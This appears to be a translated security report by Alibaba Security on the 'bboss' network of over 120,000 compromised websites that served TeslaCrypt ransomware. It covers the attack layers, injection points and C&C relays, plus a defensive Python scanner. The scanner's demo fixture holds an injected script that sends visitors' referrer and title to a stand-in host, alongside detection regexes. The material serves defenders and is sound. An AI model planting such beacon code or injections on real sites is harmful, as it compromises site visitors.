Every day we wonder: where are we in the world, and what does the world present that lies beyond our cognition? Every day we are pleasantly surprised. What surprises us is the constant arrival of new knowledge, which always makes us believe, briefly, that we understand the world a little better. The combination of doubt and surprise seems to be the strongest temptation for human beings, and it drives us to keep exploring. The transformation of the unknown into the known seems to be our only way of understanding the world. What fascinates us forever is not the unknown, but whatever comes next.
1. Prologue
Remember the end of 2015, when ransomware attacks based on the TeslaCrypt variant (the "VVV virus") were rampant? Alibaba Security Threat Intelligence Center detected a large number of such attacks delivered by e-mail. At the same time, the investigation found that some customers who had not received any such e-mail were also hit by the ransomware. Follow-up investigation showed that these customers had been infected by visiting compromised websites serving drive-by downloads.
Based on fingerprint detection of the drive-by code found in the wild, more than 120,000 websites with the same characteristics were found on the Internet. We investigated the event in depth and noticed that the program architecture behind it is highly developed, reaching an industrial level. Based on the "base layer" and "boss layer" names found in the code structure, we named it the bboss organization (event).
2. Global impact
According to whole-network monitoring data as of January 13, the bboss organization has been continuously active over the past three months, and the number of websites under its control keeps growing. The controlled sites are mainly in Europe and the United States; Asia and Africa have relatively few, but the spread continues.
Figure 1 Global threat situation of bboss
The United States was hardest hit, accounting for 30%, followed by European countries. South Korea ranked first among Asian countries at 4%, while South America, Africa and Australia accounted for the smallest shares.
Figure 2 Global distribution of bboss threats
2.1. Affected sites and software
There are more than 120,000 infected websites worldwide, about 78% of which run an open-source CMS, mainly WordPress and Joomla; WordPress alone accounts for 57%.
Figure 3 Proportion of software affected by bboss (\N indicates no CMS software)
3. Bboss technical system
With more than 120,000 websites under its control, the technical system behind bboss is also highly developed. The organization uses a multi-layer architecture for more efficient control and easier concealment, and has built the capability to control a large cluster of compromised (zombie) websites.
Figure 4 bboss technical system
The bboss technical system is roughly divided into four layers: the JS layer, the base layer, the keeper layer and the boss layer. The compromised hosts in each layer have a clear division of labour and cooperate closely. The JS layer consists of the sites that directly reach users: JS embedded in their pages constructs a request and forwards traffic to the base layer. The base layer requests instructions from the boss layer; after verification, the boss layer returns attack instructions according to the current campaign, and the base layer passes them down to the user. Meanwhile, the keeper layer regularly probes the JS layer and base layer sites for liveness, and adds, deletes, modifies and exploits them.
Figure 5 bboss hierarchical relationship
3.1. JS layer analysis
About 100,000 websites worldwide are infected at the JS layer, about 85% of which run an open-source CMS; WordPress accounts for 63% and Joomla for 10%.
Figure 6 CMS scale of JS layer sites (\N means no CMS software)
Recently we also noted the report released by Palo Alto Networks, "Angler Exploit Kit Continues to Evade Detection: Over 90,000 Websites Compromised"; compared with the published data, only 11,863 domain names matched. These websites have weak passwords or vulnerabilities in widely used software, which makes them easy to compromise; this is consistent with the many different kinds of webshell found on these websites in this event.
Figure 7 One of the webshells of the JS layer
The infection characteristic of a JS layer site is that malicious JS is embedded in the framework's head.php, so the script runs when any page of the site is visited. On WordPress-based sites it is mainly inserted via webshell into /wp-content/themes/twentyfourteen/header.php, and on Joomla-based sites into /libraries/joomla/document/html/renderer/head.php.
Figure 8 Modified header.php
The malicious JS code is shown below. It extracts the title, referer and host of the current page, constructs a request and sends it to the jquery.min.php file under the base layer domain.
Figure 9 JS layer malicious code
The keeper layer updates the JS embedded in header.php of JS layer sites from time to time, and testing showed a degree of resistance to analysis: when we simulated a JS layer site's request to a base layer site and the request was detected as a simulation, the malicious JS implanted on the corresponding JS layer site was temporarily removed for several days.
3.2. Base layer analysis
Like the JS layer, the base layer consists of a large number of compromised sites. The ratio of base layer infections to JS layer infections is about 1:5. Unlike the JS layer, the sites at this layer are no longer CMS based: 85% use no CMS at all, and very few are in China. IIS and Apache sites predominate, with a few nginx sites.
Figure 10 CMS scale of base layer sites
Earlier attacks typically implanted the malicious payload directly at this layer, but bboss does not: the base layer is still only a springboard. The characteristic of a base layer site is that after compromise, js/jquery.min.php and js/jquery-1.9.1.min.php are placed in the site directory. These two filenames are chosen to mislead users into mistaking them for the jQuery files jquery.min.js and jquery-1.9.1.min.js.
Figure 11 Base layer malicious samples
We obtained a sample of jquery.min.php and unveiled its workings. The code is encrypted and obfuscated; after decryption it can be seen that it encapsulates a bossapi class, which implements communication with the C&C servers of the back-end boss layer and parses their responses.
Figure 12 bossapi class
The main program consists of three processes. If the GET request parameters are empty, it constructs a random page path under the same domain name, which returns a 404 when visited.
Figure 13 GET is empty
The C_UTM process receives the requests constructed by the JS layer and randomly forwards them to one of the four C&Cs in the boss layer; the C&C issues malicious instructions according to the parameters in the request.
Figure 14 Flow of C_UTM
The PI process mainly receives traffic from the keeper layer and forwards it to the boss layer C&C for verification; it is used to determine whether a base layer host is alive and whether it is a forgery.
Figure 15 PI process
We also found that the communication between the base layer and the boss layer includes some anti-investigation measures. In addition, an XOR encryption/decryption class is included in the code, but it is not used by the main program.
3.3. Boss layer analysis
Unlike the first two layers, far fewer machines are infected at the boss layer. So far, by analysing several samples of jquery.min.php and jquery-1.9.1.min.php collected from the base layer, four active boss layer C&C IPs and one idle IP have been obtained. The recent traffic trends of these five IPs are as follows:
Figure 16 Traffic trend of the boss layer
Interestingly, these five IP addresses are located in five different countries: the United States, Russia, Lithuania, France and Indonesia. These independent IP addresses were also obtained through intrusion. According to our data, in November 2015 they appeared in the VVV ransomware attack as well as in some malicious promotion campaigns.
Figure 17 Malicious JS distributed by the boss layer
The boss layer issues an attack command only when an attack is wanted; usually it only issues a redirect to the Google homepage.
Figure 18 Normal redirect issued by the boss layer
3.4. Keeper layer analysis
In addition to the layers above, the bboss technical architecture also has a keeper layer. Several keeper layer IPs, also distributed across different countries, had been found by the end of this investigation. This layer mainly probes and modifies the malicious JS content of the JS layer, and probes the webshell, jquery.min.php and jquery-1.9.1.min.php of the base layer. It is also accompanied by a series of intrusion activities, such as brute-force cracking, weak-password guessing, exploitation of plugin vulnerabilities and uploading backdoored plugins through the admin back end. Here we analyse the most active keeper layer IP, 85.**.**.78 from the UAE; its traffic trend is as follows:
Figure 19 Traffic trend of a zombie keeper
The zombie keeper does not work every day; it rests periodically and the interval between rests varies, so it can be inferred that the keeper is operated by the attacker rather than running automatically. From 12-26 to 12-29 activity even stopped for 4 days. The request trend towards the JS layer is basically the same as that towards the base layer.
Figure 20 Matrix analysis of the active time of a zombie keeper
The time matrix above was drawn from the zombie keeper's active hours on each day of the past month, with the horizontal axis as the date and the vertical axis as the hour. Overlaying the data of different days onto a single day, the more days an hour appears active, the darker its colour; it can thus be inferred that the attacker is most active from about 20:00 each day until about 08:00 the next day. Clearly the attacker is not in the UTC/GMT+8 time zone, and after trying different time zones against the data, we found that in UTC/GMT-5 not only does the most active period match a normal work-and-rest pattern, but all the other data are also surprisingly consistent.
Figure 21 UTC/GMT-5 time zone
This also matches the zombie keeper's inactivity from 12-26 to 12-29 mentioned above: in fact, the attacker may have been on Christmas holiday from 12-25 to 12-28 in the UTC/GMT-5 time zone.
4. Self-inspection method
1. Check whether the front-end pages have been injected with JS code of the type shown above or other anomalies;
2. Check whether the back-end source code has been modified, especially the framework files mentioned above;
3. Check whether abnormal source files, a js directory or jquery.min.php have been added to the back end;
4. Check whether the site's access logs show abnormal access such as brute-force attempts.
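The first three checks can be scripted. The following is an added example, not code from the report: it walks a web root looking for PHP files named like jQuery builds (the base layer indicator) and for `<script>` blocks in header.php/head.php that either load a .php resource or read `document.referrer`/`document.title`, the behaviour the report attributes to the injected JS. The sample web root, the beacon snippet and the host `base-layer.example` are constructed for the demonstration.

```python
import os
import re
import tempfile
FAKE_JQUERY = re.compile(r"^jquery[-.\w]*\.php$", re.I)  # PHP file posing as a jQuery build
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
PHP_REF = re.compile(r"[\w./:-]*\.php\b", re.I)  # script block that pulls a .php resource
BEACON = re.compile(r"document\.(?:referrer|title)\b", re.I)  # harvests referer / title

def scan_header(text):
    """Flag <script> blocks that load PHP or read referrer/title (review hits by hand)."""
    findings = []
    for block in SCRIPT_BLOCK.findall(text):
        php = PHP_REF.search(block)
        if php:
            findings.append(("script-loads-php", php.group(0)))
        if BEACON.search(block):
            findings.append(("script-reads-referrer-title", block[:40]))
    return findings

def scan_webroot(root):
    """Walk a web root and return (indicator, detail) pairs for the checks above."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if FAKE_JQUERY.match(name):
                findings.append(("fake-jquery-php", rel))
            # report names wp-content/themes/twentyfourteen/header.php and
            # libraries/joomla/document/html/renderer/head.php as the injection points
            if name.lower() in ("header.php", "head.php"):
                with open(path, encoding="utf-8", errors="replace") as f:
                    findings += [(k, f"{rel}: {v}") for k, v in scan_header(f.read())]
    return findings
# Constructed sample: a clean jQuery include followed by an injected beacon (no real host)
SAMPLE_HEADER = """<head><script src="/wp-includes/js/jquery/jquery.js"></script>
<script>var u="http://base-layer.example/js/jquery.min.php?r="+encodeURIComponent(document.referrer)
+"&t="+encodeURIComponent(document.title);var s=document.createElement("script");s.src=u;
document.head.appendChild(s);</script></head>"""
def build_demo_webroot():
    """Create a throwaway web root holding one clean file and the constructed indicators."""
    root = tempfile.mkdtemp(prefix="bboss-demo-")
    files = {"js/jquery.min.js": "/* genuine jQuery would be here */",
             "js/jquery.min.php": "<?php /* constructed stand-in for the relay script */",
             "wp-content/themes/twentyfourteen/header.php": SAMPLE_HEADER}
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(body)
    return root
```

Run `scan_webroot("/var/www/html")` (or the actual document root) and review every hit; legitimate inline code that mentions admin-ajax.php is reported too, so confirm before deleting anything.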
5. Repair suggestions
1. Check for suspicious new users and change the site passwords;
2. Remove newly added or modified suspicious code;
3. Remove plugins that are no longer used, and upgrade the CMS and third-party plugins to the latest version;
4. Add protective measures such as anti-brute-force controls and a WAF.
6. Summary
Based on the analysis and data above, bboss has the following characteristics:
1. It controls more than 120,000 websites and has global reach;
2. Its technical architecture is highly mature, multi-level and hierarchical, easy to control and conceal, and shows a strong awareness of attack and defence;
3. Its operation is flexible, highly configurable and updated irregularly;
4. The scope of harm is huge, affecting tens of millions of Internet users.
*Author: Alibaba Security (enterprise account). Please credit FreeBuf hackers and geeks (freebuf.com) when reprinting.